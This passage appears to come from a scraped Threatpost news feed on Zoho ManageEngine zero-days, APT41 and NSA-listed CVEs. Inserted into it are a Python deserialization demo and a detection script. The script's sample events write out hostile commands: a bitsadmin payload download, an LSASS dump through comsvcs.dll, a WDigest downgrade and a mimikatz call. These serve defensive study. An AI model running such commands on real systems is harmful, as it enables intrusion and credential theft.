zero-day vulnerability is under active attack from an APT group, this time looking to override legitimate functions of servers running ManageEngine Desktop Central and elevate privileges \u2014 with an ultimate goal of dropping malware onto organizations\u2019 networks, the FBI has warned.\n\nAPT actors have been exploiting the 
bug, tracked as [CVE-2021-44515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44515>), since at least late October, the feds revealed in an [FBI Flash alert](<https://www.ic3.gov/Media/News/2021/211220.pdf>) released last week. There is also evidence that it\u2019s being used in an attack chain with two other Zoho bugs that researchers have observed under attack since September, according to the alert.\n\nThe latest vulnerability is an authentication-bypass vulnerability in ManageEngine Desktop Central that can allow an attacker to execute arbitrary code in the Desktop Central server, according to a Zoho [advisory](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) that addressed the issue, published earlier this month.\n\nIndeed, the feds said they observed APT actors doing exactly that. More specifically, researchers observed attackers \u201ccompromising Desktop Central servers, dropping a webshell that overrides a legitimate function of Desktop Central, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials,\u201d according to the Flash Alert.\n\nZoho has addressed the vulnerability and is urging organizations to update to the appropriate latest builds of ManageEngine Desktop Central due to \u201cindications of exploitation,\u201d the company said in its advisory.\n\nSpecifically, the company is advising enterprise customers who have builds 10.1.2127.17 and below deployed to upgrade to build [10.1.2127.18](<https://downloads.zohocorp.com/dnd/Desktop_Central/vSfr4V3f7NXjEJK/ManageEngine_Desktop_Central_10_1_0_SP-2127_18.ppm>); and those using builds 10.1.2128.0 to 10.1.2137.2 to upgrade to build [10.1.2137.3](<https://downloads.zohocorp.com/dnd/Desktop_Central/5fbkfifZFuh9mVx/ManageEngine_Desktop_Central_10_1_0_SP-2137_3.ppm>).\n\n## **Zoho Under Fire**\n\nThe bug is the 
third zero-day under active attack that researchers have discovered in the cloud platform company\u2019s ManageEngine suite since September, spurring dire warnings from the FBI and researchers alike.\n\nThough no one has yet conclusively identified the APT responsible, it\u2019s likely the attacks are linked and those responsible are from China, previous evidence suggests.\n\nEarlier this month, researchers at Palo Alto Networks Unit 42 [revealed](<https://threatpost.com/threat-group-takes-aim-again-at-cloud-platform-provider-zoho/176732/>) that state-backed adversaries were using vulnerable versions of ManageEngine ServiceDesk Plus to target a number of U.S. organizations between late October and November.\n\nThe attacks were related to a bug revealed in a Nov. 22 [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021>) by Zoho alerting customers to active exploitation of the newly registered [CVE-2021-44077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077>) in ManageEngine ServiceDesk Plus. The vulnerability, which allows for unauthenticated remote code execution, impacts ServiceDesk Plus versions 11305 and below.\n\nThat news came on the heels of [warnings](<https://threatpost.com/cisa-fbi-state-backed-apts-exploit-critical-zoho-bug/174768/>) in September by the FBI, CISA and the U.S. 
Coast Guard Cyber Command (CGCYBER) that an unspecified APT was exploiting a then-zero-day vulnerability in Zoho ManageEngine\u2019s password management solution called ADSelfService Plus.\n\nZoho issued [a fix](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) for the vulnerability, tracked as [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>), soon after; still, researchers observed attackers [exploiting it](<https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/>) later in November in their continued assault on defense, energy and healthcare organizations.\n\nUnit 42 researchers grouped the two previously known active attack fronts against Zoho\u2019s ManageEngine under the name [\u201cTiltedTemple\u201d](<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>), and said earlier this month that there is evidence to link the APT responsible to China, although it is not conclusive.\n\nThe latest Flash Alert released by the FBI also shows a correlation between earlier APT attacks on ManageEngine and ADSelfService Plus, with malicious samples of code observed in the latest exploitation \u201cdownloaded from likely compromised ManageEngine ADSelfService Plus servers,\u201d according to the alert.\n\n## **Inside the Exploitation**\n\nThose samples show initial exploitation of a Desktop Central API URL that allowed for an unauthenticated file upload of two different variants of webshells; the first variant was delivered using either the file name \u201cemsaler.zip\u201d or \u201ceco-inflect.jar\u201d in late October and mid-November, respectively; and a second variant using the file name \u201caaa.zip\u201d in late November.\n\nThe webshell overrides the legitimate Desktop Central API servlet endpoint, \u201c/fos/statuscheck,\u201d and filters inbound requests to that URL path (POST requests in the case of the first variant, GET requests in the case of the second), 
according to the FBI. It then allows attackers to execute commands as the SYSTEM user with elevated privileges if the inbound requests pass the filter check.\n\nThe webshell allows attackers to conduct initial reconnaissance and domain enumeration, after which the actors use BITSAdmin to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe, according to the FBI. Attackers then sideload the dropper through AppLaunch execution, creating a persistent service to execute the AppLaunch binary moving forward.\n\n\u201cUpon execution, the dropper creates an instance of svchost and injects code with RAT-like functionality that initiates a connection to a command and control server,\u201d according to the FBI.\n\nThreat actors conduct follow-on intrusion activity through the RAT, including attempted lateral movement to domain controllers and credential dumping techniques using Mimikatz, comsvcs.dll LSASS process memory dumping, and a WDigest downgrade attack with subsequent LSASS dumping through pwdump, researchers observed.\n\nThe FBI Flash Alert includes a detailed list of indicators of compromise so organizations using Zoho\u2019s ManageEngine Desktop Central can check to see if they are at risk or have been a victim of attack.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-21T14:42:02", 
"type": "threatpost", "title": "FBI: Another Zoho ManageEngine Zero-Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44077", "CVE-2021-44515"], "modified": "2021-12-21T14:42:02", "id": "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "href": "https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:50", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. 
Steven Seeley of Source Incite [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter on Thursday, along with a proof-of-concept (PoC) exploit. According to ZDNet, Zoho will release a patch for the flaw on Friday.\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of Desktop Central, which is used to read data from and write data to a file. The issue results from improper validation of user-supplied data, which allows deserialization of untrusted data; because the serialized stream controls which objects are reconstructed, an attacker who can supply it controls what code runs.\n\nSeeley told Threatpost that an attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \n> Exploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. 
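The bug class Seeley describes, deserialization of untrusted data, is easier to see in code than in prose. The block below is an added example written for this page; it is not from Seeley's advisory or PoC, nor from Zoho's code. Desktop Central's FileStorage class is Java, so this is the same pattern rendered in Python with pickle, whose behaviour on hostile input is equivalent: the byte stream, not the receiving code, decides which callables run during load. The `gadget` function, the `Payload` class, the allow-list in `RestrictedUnpickler` and both sample streams are assumptions constructed for the demo.

```python
"""Added example (not Zoho's code, not Seeley's PoC): deserialization of
untrusted data, the bug class behind CVE-2020-10189, shown with pickle.
The vulnerable loader trusts whatever bytes arrive; the hardened loader
resolves only an allow-list of classes and refuses everything else."""
import io
import pickle

# Records every gadget invocation so the demo has no other side effect.
EXECUTED = []


def gadget(tag):
    """Stand-in for whatever the attacker's stream makes the loader call."""
    EXECUTED.append(tag)
    return tag


class Payload:
    """Attacker-built object: on load, pickle calls gadget('...') for us."""
    def __reduce__(self):
        # pickle records (callable, args); load() calls callable(*args).
        return (gadget, ("untrusted code ran",))


def attacker_stream() -> bytes:
    """Constructed hostile input, as if uploaded to the FileStorage endpoint."""
    return pickle.dumps(Payload())


def benign_stream() -> bytes:
    """Constructed legitimate input: only primitive containers."""
    return pickle.dumps({"job": "backup", "files": [1, 2]})


def unsafe_load(data: bytes):
    """The vulnerable pattern: deserialize user-supplied bytes as-is."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only an allow-list of (module, name); refuse anything else."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"),
               ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to resolve {module}.{name}")


def safe_load(data: bytes):
    """Hardened loader: the stream cannot name arbitrary callables."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def safe_load_rejects(data: bytes) -> bool:
    """True if the hardened loader refuses the stream without running a gadget."""
    before = len(EXECUTED)
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return len(EXECUTED) == before
    return False


if __name__ == "__main__":
    print("unsafe:", unsafe_load(attacker_stream()), EXECUTED)
    print("safe rejects hostile stream:", safe_load_rejects(attacker_stream()))
    print("safe loads benign stream:", safe_load(benign_stream()))
```

The allow-list is defence in depth, not the fix: the fix for an endpoint like this is to never hand attacker-controlled bytes to a general-purpose deserializer at all, and to use a data-only format (JSON with a schema) for anything that crosses a trust boundary.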
Nate Warfield, a security researcher with Microsoft, pointed to [at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However, Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. 
Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. 
Previously, a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 
20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they homed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 
17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. 
Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[APT41 exploitation timeline (image)](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>)) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). 
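Both Desktop Central intrusions on this page leave the same kind of trace in process-creation telemetry: the FBI-described chain (BITSAdmin download of mscoree.dll and the AppLaunch binary iop.exe, DLL sideload, comsvcs.dll LSASS dump, WDigest downgrade, pwdump and Mimikatz) and APT41's two paths (a Java program that spawns PowerShell, and BITSAdmin). The detector below is an added example written for this page, not code from the FBI, FireEye or Zoho. It assumes events carry `image`, `original_file_name`, `command_line` and `parent_image` fields (the shape of a Sysmon event ID 1 export); the `ProcEvent` class, the rule names, the Desktop Central install path and every sample event are constructed for the demo.

```python
"""Added example (not the FBI's, FireEye's or Zoho's code): rules over
process-creation events for the Desktop Central post-exploitation chain
described on this page.  Event shape and all sample events are assumptions."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    image: str               # full path of the created process
    original_file_name: str  # PE version-info name; survives renaming (iop.exe)
    command_line: str
    parent_image: str


def _ci(pattern: str) -> re.Pattern:
    return re.compile(pattern, re.IGNORECASE)


# Directories where AppLaunch.exe and friends legitimately live.
_TRUSTED_DIR = _ci(r"^[a-z]:\\windows\\(system32|syswow64|microsoft\.net)\\")
_BITS_VERB = _ci(r"/(transfer|addfile)\b")
_URL = _ci(r"https?://")
_COMSVCS_DUMP = _ci(r"comsvcs(\.dll)?\s*,?\s*(#24|minidump)")
_WDIGEST_ON = _ci(r"(/d|-value)\s+0*1\b")
_CRED_TOOL = _ci(r"\b(mimikatz|pwdump|sekurlsa)")
_DC_JAVA = _ci(r"desktopcentral.*\\java\.exe$")  # assumed install path

RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    # BITSAdmin pulling a payload from a URL (used in both intrusions).
    ("bitsadmin_download", lambda e:
        e.original_file_name.lower() == "bitsadmin.exe"
        and bool(_BITS_VERB.search(e.command_line))
        and bool(_URL.search(e.command_line))),
    # AppLaunch.exe (even renamed) running outside its framework directory:
    # the sideload of a dropper DLL placed next to it.
    ("applaunch_sideload", lambda e:
        e.original_file_name.lower() == "applaunch.exe"
        and not _TRUSTED_DIR.search(e.image)),
    # rundll32 comsvcs.dll MiniDump of a process (LSASS memory dump).
    ("comsvcs_lsass_dump", lambda e:
        "rundll32" in e.image.lower()
        and bool(_COMSVCS_DUMP.search(e.command_line))),
    # WDigest UseLogonCredential=1: plaintext credentials return to LSASS.
    ("wdigest_downgrade", lambda e:
        "wdigest" in e.command_line.lower()
        and "uselogoncredential" in e.command_line.lower()
        and bool(_WDIGEST_ON.search(e.command_line))),
    # Credential-dumping tooling by argument, since binaries get renamed.
    ("credential_tool", lambda e: bool(_CRED_TOOL.search(e.command_line))),
    # Desktop Central's Java process spawning PowerShell (APT41 logger.zip path).
    ("desktopcentral_spawns_powershell", lambda e:
        bool(_DC_JAVA.search(e.parent_image))
        and "powershell" in e.image.lower()),
]


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, e in enumerate(events)
            for name, pred in RULES if pred(e)]


# Constructed sample telemetry: indices 0-5 reproduce the chain, 6-7 are benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
              r"bitsadmin /transfer j /download /priority high http://198.51.100.7/mscoree.dll C:\Users\Public\mscoree.dll",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\Public\iop.exe", "AppLaunch.exe", "iop.exe",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", "RUNDLL32.EXE",
              r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\l.dmp full",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe", "reg.exe",
              r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              r'powershell.exe -nop -w hidden -c "Start-Process C:\Windows\Temp\install.bat"',
              r"C:\Program Files\DesktopCentral_Server\jre\bin\java.exe"),
    ProcEvent(r"C:\Users\Public\m.exe", "m.exe", r'm.exe "sekurlsa::logonpasswords" exit',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe", "AppLaunch.exe",
              "AppLaunch.exe", r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\reg.exe", "reg.exe",
              r"reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx].command_line}")
```

Two design points matter in practice: matching the renamed iop.exe needs the PE's OriginalFileName rather than the on-disk name, and matching renamed credential tools needs their arguments rather than their binary name. The benign AppLaunch.exe from the .NET framework directory and the `reg query` of the WDigest key show the rules staying quiet on ordinary activity; a real deployment would map the four fields onto the EDR or Sysmon schema in use and tune `_DC_JAVA` to the actual install path.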
Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity**\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. 
More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>), [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winnti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned 
the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. 
